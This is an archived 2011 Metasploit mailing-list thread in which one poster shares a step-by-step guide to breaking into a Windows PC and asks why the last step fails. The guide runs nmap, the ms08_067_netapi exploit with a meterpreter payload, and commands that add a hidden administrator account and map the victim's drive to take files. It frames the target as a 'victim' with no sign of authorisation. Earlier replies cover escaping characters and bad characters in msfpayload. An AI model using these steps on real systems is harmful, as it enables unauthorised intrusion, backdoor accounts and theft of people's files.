Home page logo

metasploit logo Metasploit mailing list archives

Re: Escape characters
From: ravindra kalal <itravin () gmail com>
Date: Fri, 1 Apr 2011 17:14:08 +0530

Hi friends,

I have just started using metasploit, i have successfully hacked a pc with
the help from  (N0F () T3, MinSteRexS), pls find the below instructions which i
have followed:
We download nmap (nmap.org) so that we can scan the remote pc.
- On the terminal we write: nmap -sS -O <target ip>
- If you see that ports 139 TCP and 445 TCP are open then everything is
exactly as we want it to be.
- Now we download Metasploit (metasploit.org) and we open it via the
- Now that Metasploit is running we start the attack.
- We write at the terminal “show exploits” and we get a list of the
avaliable exploits.
- We choose the exploit “ms08_067_netapi” by writing “use
- Now we set RHOST to our victims ip: “set RHOST <target ip>”
- And RPORT to 445: “set RPORT 445″
- Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0″
and hit ENTER again.
- OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp”
- IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER.
- If everything is ok you should see the following message: “[*] Meterpeter
session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)
- Meterpeter is running. We are inside the target pc!
- Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i”
- If it says “X:\WINDOWS\System32″ then the mission is accomplished.
- Now lets create our own admin account.
- Write: “net user n0f4t3 mypass /add”. You should see a confirmation
message saying “The command completed successfully.”
- Now lets make the account an admin: “net localgroup administrators n0f4t3
- You should see again the confirmation message saying: “The command
completed successfully.”
- Then type “exit” to exit CMD.
- OMG!! We made it!!! But how can we steal his files????
- We boot from Windows……….
- We go to “Start>Run”, we type “cmd” and we hit ENTER.
- Then we write “net use X: \\<target ip>\C mypass /user:n0f4t3″ and hit
- If that doesn’t work type “net use X: \\<target ip>\C: mypass
/user:n0f4t3″ and hit ENTER
- Now go to “My Computer” and you should see a new Drive called X:. Open it
and enjoy the victim’s files.
i was successful in creating a user with local administrators right in
victims pc but when i am trying to map victims drive i am getting following
error :

*C:\Documents and Settings\admin>net use R: \\\c$ 123 () 456/user:suki
System error 5 has occurred.

Access is denied.
Pls guide..................

thanks and regards,
ravin k
On Fri, Apr 1, 2011 at 1:07 PM, <danuxx () gmail com> wrote:

Then, You could try to use msfconsole instead and from there set the
Payload options, that will take care of it.
Sent via BlackBerry from Danux Network

-----Original Message-----
From: Eric <dkn4a1 () gmail com>
Sender: framework-bounces () spool metasploit com
Date: Fri, 1 Apr 2011 12:52:49
To: Jose Selvi<jselvi () pentester es>
Cc: <framework () spool metasploit com>
Subject: Re: [framework] Escape characters

No. I'm not trying to encode the shellcode.

Suppose, I want to generate a payload executable with msfpayload for
windows/exec payload with parameter CMD=cmd /c start calc & start
In this case, obviously I need to escape spaces, \ and & characters, like
msfpayload windows/exec CMD=cmd\ \/c\ start\ calc\ \&\ start\ notepad

Likewise, which all character I need to escape to make it work perfectly

On Fri, Apr 1, 2011 at 12:36 PM, Jose Selvi <jselvi () pentester es> wrote:
MSFEncode is who encode the payload without badchars.
Badchars depends on wich vulnerability are you exploiting. Each
vulnerability has their own badchars so there isn't a single list of
universal badchars. Some of them are quite common like 0x00 (end of
but I think there isn't any universal list.

What vulnerability are you exploiting?


El 01/04/11 08:53, Eric escribió:

Hello all,

What all special characters should be escaped with msfpayload?
I believe<  >  ; : ' " / ( ) %&

Could I find documentation regarding this somewhere?

Thanks in advance.

Jose Selvi.
Security Technical Consultant


SANS Mentor in Madrid (Spain). September 23 - November 25
SEC560: Network Penetration Testing and Ethical Hacking



*Thanks & Regards,
ravindra Kalal*

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]